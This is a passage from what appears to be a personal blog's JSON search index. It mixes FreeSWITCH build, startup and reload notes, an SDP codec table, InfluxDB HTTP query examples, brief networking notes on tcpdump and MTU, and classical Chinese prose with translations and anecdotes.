Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration.","title":"编译FS"},{"content":"\n运行fs 前台运行 freeswitch 后台运行 freeswitch -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source\nFile locations -base [basedir] \u0026ndash; alternate prefix directory-conf [confdir] \u0026ndash; alternate 
directory for FreeSWITCH configuration files-log [logdir] \u0026ndash; alternate directory for logfiles-run [rundir] \u0026ndash; alternate directory for runtime files-db [dbdir] \u0026ndash; alternate directory for the internal database-mod [moddir] \u0026ndash; alternate directory for modules-htdocs [htdocsdir] \u0026ndash; alternate directory for htdocs-scripts [scriptsdir] \u0026ndash; alternate directory for scripts-temp [directory] \u0026ndash; alternate directory for temporary files-grammar [directory] \u0026ndash; alternate directory for grammar files-recordings [directory] \u0026ndash; alternate directory for recordings-storage [directory] \u0026ndash; alternate directory for voicemail storage-sounds [directory] \u0026ndash; alternate directory for sound filesIf you set the file locations of any one of -conf, -log, or -db you must set all three. File Paths A handy method to determine where FreeSWITCH™ is currently looking for files (in linux):Method for showing FS paths\nbash\u0026gt; fs_cli -x \u0026#39;global_getvar\u0026#39;| grep _dir base_dir=/usrrecordings_dir=/var/lib/freeswitch/recordingssounds_dir=/usr/share/freeswitch/soundsconf_dir=/etc/freeswitchlog_dir=/var/log/freeswitchrun_dir=/var/run/freeswitchdb_dir=/var/lib/freeswitch/dbmod_dir=/usr/lib/freeswitch/modhtdocs_dir=/usr/share/freeswitch/htdocsscript_dir=/usr/share/freeswitch/scriptstemp_dir=/tmpgrammar_dir=/usr/share/freeswitch/grammarfonts_dir=/usr/share/freeswitch/fontsimages_dir=/var/lib/freeswitch/imagescerts_dir=/etc/freeswitch/tlsstorage_dir=/var/lib/freeswitch/storagecache_dir=/var/cache/freeswitchdata_dir=/usr/share/freeswitchlocalstate_dir=/var/lib/freeswitchArgument CautionsSetting some arguments may affect behavior in unexpected ways. 
The following list contains known side-effects of setting various command line arguments.* nosql - Setting nosql completely disables the use of coreDB which means you will not have show channels, show calls, tab completion, or anything else that is stored in the coreDB.\n","permalink":"https://wdd.js.org/freeswitch/command-line/","summary":"运行fs 前台运行 freeswitch 后台运行 freeswitch -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source","title":"fs 命令行"},{"content":" Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) 
ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.conf.xml first Update a lua file nothing necessary file is loaded from disk each time it is run Update LCR SQL table nothing necessary SQL query is run for each new call Update LCR options reload mod_lcr Edit lcr.conf.xml first Update CID Lookup Options reload mod_cidlookup Edit cidlookup.conf.xml first Update JSON CDR Options reload mod_json_cdr Edit json_cdr.conf.xml first Update XML CDR Options reload mod_xml_cdr Edit xml_cdr.conf.xml first Update XML CURL Server Response nothing, unless using cache ","permalink":"https://wdd.js.org/freeswitch/reload/","summary":"Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.","title":"fs reload命令"},{"content":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 
192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的是都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMF的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.iana.org/assignments/rtp-parameters/rtp-parameters.xhtml https://www.3cx.com/blog/voip-howto/sdp-voip2/ https://www.3cx.com/blog/voip-howto/sdp-voip/ ","permalink":"https://wdd.js.org/opensips/ch4/codec-table/","summary":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的是都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMF的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.","title":"rtp编码表"},{"content":" 查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, 
\u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开\nq=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39;;SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-09T00:10:00Z\u0026#39; 返回结果中的statement_id就表示对应的语句\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] }, { \u0026#34;statement_id\u0026#34;: 1, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;count\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;1970-01-01T00:00:00Z\u0026#34;, 3 ] ] } ] } ] } 查询结果 按分钟求平均值 q=SELECT MEAN(real_used_size) FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T03:10:00Z\u0026#39; GROUP BY time(1m) 其他查询参数 chunked=[true | db=\u0026lt;database_name\u0026gt; epoch=[ns,u,µ,ms,s,m,h] p= pretty=true q= u= 参考教程 报错处理 https://docs.influxdata.com/influxdb/v1.7/troubleshooting/errors/ 数据查询 
https://docs.influxdata.com/influxdb/v1.6/guides/querying_data/ 函数 https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ ","permalink":"https://wdd.js.org/posts/2019/12/pv5xgz/","summary":"查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开","title":"influxdb HTTP 接口学习"},{"content":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump\n","permalink":"https://wdd.js.org/opensips/tools/tcp-dump/","summary":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump","title":"tcp-dump"},{"content":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1492。链路层的这个特性称作MTU, 最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。\n","permalink":"https://wdd.js.org/network/xwuvyr/","summary":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1492。链路层的这个特性称作MTU, 
最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。","title":"2 链路层"},{"content":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”\n","permalink":"https://wdd.js.org/posts/2019/11/wkyqnl/","summary":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 
王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”","title":"登徒子好色赋"},{"content":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖
以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。\n","permalink":"https://wdd.js.org/posts/2019/11/ck3yzp/","summary":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。","title":"洛神赋"},{"content":"有两种选择,要么被忽悠成韭菜被别人割,要么割别热的韭菜。\n","permalink":"https://wdd.js.org/posts/2019/11/blqt1k/","summary":"有两种选择,要么被忽悠成韭菜被别人割,要么割别热的韭菜。","title":"割韭菜"},{"content":" 
“狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~\n","permalink":"https://wdd.js.org/posts/2019/11/urkvnz/","summary":"“狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~","title":"朝三暮四"},{"content":" 冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》\n","permalink":"https://wdd.js.org/posts/2019/11/kug5fo/","summary":"冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》","title":"众生鱼肉"},{"content":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 